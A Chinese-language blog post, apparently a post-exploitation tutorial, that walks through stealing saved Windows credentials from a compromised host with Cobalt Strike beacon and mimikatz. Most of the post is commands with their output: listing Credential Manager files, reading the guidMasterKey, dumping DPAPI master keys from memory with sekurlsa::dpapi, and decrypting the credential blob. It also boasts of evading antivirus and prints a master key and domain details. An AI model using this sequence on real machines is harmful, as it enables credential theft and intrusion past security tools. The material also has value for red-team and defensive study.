有时候我们得到这个一个机器的权限,我们都想获取到更加多的密码,我都是在Cobalt Strike下操作的,我
可以hashdump,可以logonpasswords,可以mimikatz privilege::debug sekurlsa::dpapi,我可以上传LaZagne.exe,并执行laZagne.exe all来获取更加多的密码,但是姿势还可以多一点,当然,lazagne.exe貌似也是集合了本文所要讲的办法,但是却做不到全面,现在也自己被Windows defender追杀了,情况不容乐观,当然可以源码免杀,可以自己通过python源代码免杀,但是不全面是硬伤,这个时候就需要手动来操作了。
mimikatz也被各种杀软追杀!所以我用Cobalt Strike,我免杀了Cobalt Strike,所以用mimikatz也就遁于无形。

beacon> shell dir /a c:\users\<username>\appdata\local\microsoft\credentials\
[*] Tasked beacon to run: dir /a c:\users\administrator\appdata\local\microsoft\credentials\
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is CE31-FE5F

 Directory of c:\users\administrator\appdata\local\microsoft\credentials

04/05/2018  09:44 AM    <DIR>          .
04/05/2018  09:44 AM    <DIR>          ..
03/06/2018  03:02 PM               380 7FA328901B1E61D20AFA2CEA89D36009
03/06/2018  03:02 PM               588 93C6B874E906FCF89C21933241164C86
04/05/2018  09:44 AM               412 C683A6C121208458166FA7833F8EC83E
02/23/2018  01:37 PM            11,204 DFBE70A7E5CC19A398EBF1B96859CE5D
               4 File(s)         12,584 bytes
               2 Dir(s)   4,612,083,712 bytes free

这是全部的Credentials了,我们要一个一个解开。比如我们解第三个C683A6C121208458166FA7833F8EC83E

beacon> mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\C683A6C121208458166FA7833F8EC83E
[*] Tasked beacon to run mimikatz's dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\C683A6C121208458166FA7833F8EC83E command
[+] host called home, sent: 825925 bytes
[+] received output:
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : b1d4fdf2947beabf350bb95c5e8da0ac
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 7881067f9d6878854a2f5ddaa88f1b3c
  dwDataLen          : 000000d8 - 216
  pbData             : b8cdb7945ab825e8edea9532d16230fe33eab0fc01c32c4be4058fdf20631d232eb5a9deee944xxxxxxxxxxxxxxxxxmarkxxxxxxxxxxxxxe6fc896d538a5d01610571f29141c330a5be3da63ef194f4677a7e7f8deed1c7aba94cab0f2d95ba9558b86a9733e8cc035ba49fd8c1340524f5bb797e68a7bf5487d1764608c8c7f8ac12a87f21b4079xxxxxxxxxxxxxxxxxmarkxxxxxxxxxxxxxe0e2d93a184b09f6d01580a5390a17489e722fca14bc7bf7d18d77caec1419414ed3c082822c619e6aebedde5a1d1798a953b32a88f7000386bdb7a9b7c74d9c572763c
  dwSignLen          : 00000014 - 20
  pbSign             : f846214114391c480ffafc3baabd613b4c0394aa

我们得到这一串:guidMasterKey : {3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a},要的就是guidMasterKey的值。

beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 825929 bytes
[+] received output:

Authentication Id : 0 ; 1494757 (00000000:0016cee5)
Session           : Batch from 0
User Name         : Administrator
Domain            : PORTALDEV
Logon Server      : PORTAL-DEV1
Logon Time        : 4/7/2018 11:32:20 AM
SID               : S-1-5-21-284598634-2221908637-1703617853-500


Authentication Id : 0 ; 206890 (00000000:0003282a)
Session           : Service from 0
User Name         : MSSQLFDLauncher
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 4/7/2018 11:26:22 AM
SID               : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582


Authentication Id : 0 ; 389321 (00000000:0005f0c9)
Session           : RemoteInteractive from 2
User Name         : administrator
Domain            : PORTALDEV
Logon Server      : PORTAL-DEV1
Logon Time        : 4/7/2018 11:26:47 AM
SID               : S-1-5-21-284598634-2221908637-1703617853-500
     [00000000]
     * GUID      :  {3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a}
     * Time      :  4/8/2018 2:34:45 PM
     * MasterKey :  5ede0ba6e8841d33c7b711ecdc1c6df60dd7ad836f7fa4c75ab6e592257fe25d8be1ffa8f21fb06f8e8ae07bea1b118333447cf6116b83d9cdee40c974b29a46
     * sha1(key) :  b9b910fb85bc5c1bdc19a87a9203e9853a656072

找到上面{3eba1e8e-2efc-402e-8829-d0fd9f2e0f4a}所对应的MasterKey就是5ede0ba6e8841d33c7b711ecdc1c6df60dd7ad836f7fa4c75ab6e592257fe25d8be1ffa8f21fb06f8e8ae07bea1b118333447cf6116b83d9cdee40c974b29a46,然后操作mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\要解密的 /masterkey:得到的MasterKey,那么就是:

mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\C683A6C121208458166FA7833F8EC83E/masterkey:5ede0ba6e8841d33c7b711ecdc1c6df60dd7ad836f7fa4c75ab6e592257fe25d8be1ffa8f21fb06f8e8ae07bea1b118333447cf6116b83d9cdee40c974b29a46

执行之后就会得到结果了,当然不排除未知的问题!!
CredentialBlob的值就是秘密了!

还不懂的看这里,再剩下的自己领会了。
https://www.t00ls.net/articles-41926.html
http://www.freebuf.com/articles/network/146460.html

2 Replies to “mimikatz获取本地Credentials”

发表评论

电子邮件地址不会被公开。 必填项已用*标注